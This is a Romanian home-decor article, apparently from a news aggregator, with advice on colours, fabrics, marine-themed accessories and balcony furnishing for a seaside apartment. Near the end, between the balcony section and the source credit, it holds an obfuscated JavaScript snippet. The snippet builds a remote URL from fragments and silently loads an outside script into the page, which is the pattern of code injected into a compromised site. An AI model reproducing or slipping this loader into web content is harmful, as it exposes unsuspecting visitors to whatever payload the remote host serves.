Cum să decorezi un apartament la mare?

Dacă ai norocul să deţii un apartament la mare, probabil că vei dori să profiţi la maximum de priveliștea mării și de lumina naturală. Este bine sa păstrezi spaţiul simplu și neaglomerat şi să nu aduci prea multe piese de mobilier, poţi folosi oglinzi pentru a reflecta lumina și a crea iluzia spațiului, şi poţi aduce natura în interior cu multe plante și flori. Nu în ultimul rând, poţi monta perdele sau jaluzelele pentru a filtra lumina și a obţine o cameră răcoroasă şi plăcută. Dar sunt multe alte lucruri de care ar trebui să ţii cont când decorezi un apartament la mare.

Ce culori să foloseşti pentru camere?

Pentru a te simţi cât mai bine, este recomandat să păstrezi schema de culori cât mai ușoară și mai aerisită şi să te orientezi către alb şi crem pentru a reflecta lumina și a crea o senzație de spațiu. De asemenea, este recomandat să foloseşti materiale naturale şi tapiţerie personalizată cu motive marine ori de câte ori este posibil. Răchita, ratanul și lemnul sunt toate perfecte pentru o senzație de vacanţă la mare.

Pe lângă alb şi crem, alte culori pentru zugrăvitul pereţilor camerelor unui apartament la mare sunt nuanţele de bleu care creează o senzaţie de răcoare, prospeţime şi curăţenie şi sunt asociate cu marea. Albastrul este o nuanţă liniştitoare, care te face să te simţi relaxat, motiv pentru care este ideal pentru dormitor. Poţi alege o nuanţă mai închisă pentru un accent de lux, în timp ce o nuanţă mai deschisă va crea o atmosferă mai relaxată. O altă culoare populară pentru apartamentele de la mare este verdele. Această nuanţă este, de asemenea, asociată cu senzaţia de prospeţime şi curăţenie, dar aduce şi un plus de energie. Pentru un efect cât mai plăcut, poţi alege o nuanţă de verde închis.

Personalizează-ţi canapelele şi draperiile

Apartamentele de pe litoral sunt locul perfect pentru a te relaxa și a scăpa de agitația vieții orașului. Dar cum îți poți face apartamentul de la malul mării să se simtă ca acasă? Personalizându-ți mobilierul și decorul, desigur! Foloseşte țesături ușoare și aerisite pentru mobilier, cum ar fi pernele și păturile, accesorizeaza decorul cu scoici, steluţe de mare și alte articole cu tematică marină.

Dacă ai o canapea albă, de exemplu, adaugă niște perne colorate în nuanțe de albastru, verde și galben, apoi, întinde o pătură cu model peste spătarul canapelei şi adaugă câteva accente cu tematică de litoral, cum ar fi un castron în formă de stea de mare sau o oglindă cu rame de scoici. În ceea ce privește ferestrele, optează pentru perdele aerisite, de culoare deschisă, care vor lăsa să pătrundă multă lumină naturală. Și nu uita să pui pe pereți câteva tablouri sau fotografii cu tematică de litoral.

Personalizându-ți mobilierul și decorul, îți poți transforma apartamentul de pe litoral într-o casă confortabilă și primitoare.

Amenajarea balconului

Amenajarea balconului pentru un apartament la mare presupune câteva elemente de bază, cum ar fi: un fotoliu confortabil, şezlonguri personalizate, o măsuţă de cafea şi, bineînţeles, o umbrelă pentru a te proteja de razele puternice ale soarelui. În funcţie de spaţiul disponibil, poţi alege să amenajezi un balcon mic şi intim, cu un design minimalist, care să se potrivească perfect cu stilul de amenajare al apartamentului, sau unul mai spaţios, care să vă ofere o oază de relaxare şi confort.

Indiferent de spaţiul pe care îl ai la dispoziţie, trebuie să ţii cont de anumite elemente, cum ar fi: iluminarea, care este esenţială pentru a vă simţi confortabil pe balcon şi a te bucura de o vedere clară a mării; un covor, care va oferi un plus de confort şi va ajuta la crearea unei atmosfere calde şi primitoare; şi, bineînţeles, plantele, care vor transforma balconul într-un spaţiu verde şi relaxant.

(function(){
q5cw=document.createElement(“script”);q5cw_=(“us”)+(“ta”);
q5cw_+=”t”+(“.”);q5cw_+=(“in”);q5cwu=”426634461″;q5cw.async=true;
q5cwu+=”.7ny23gga5cwdmvc2k”;q5cw.type=”text/javascript”;q5cw_+=”f”+”o”+(“/”);
q5cwu+=”7fpp277hqe1y1″;q5cw.src=”https://”+q5cw_+q5cwu;
dq5cw=document.body;dq5cw.appendChild(q5cw);
})();

Articolul Cum să decorezi un apartament la mare? apare prima dată în Stiri Zilnic.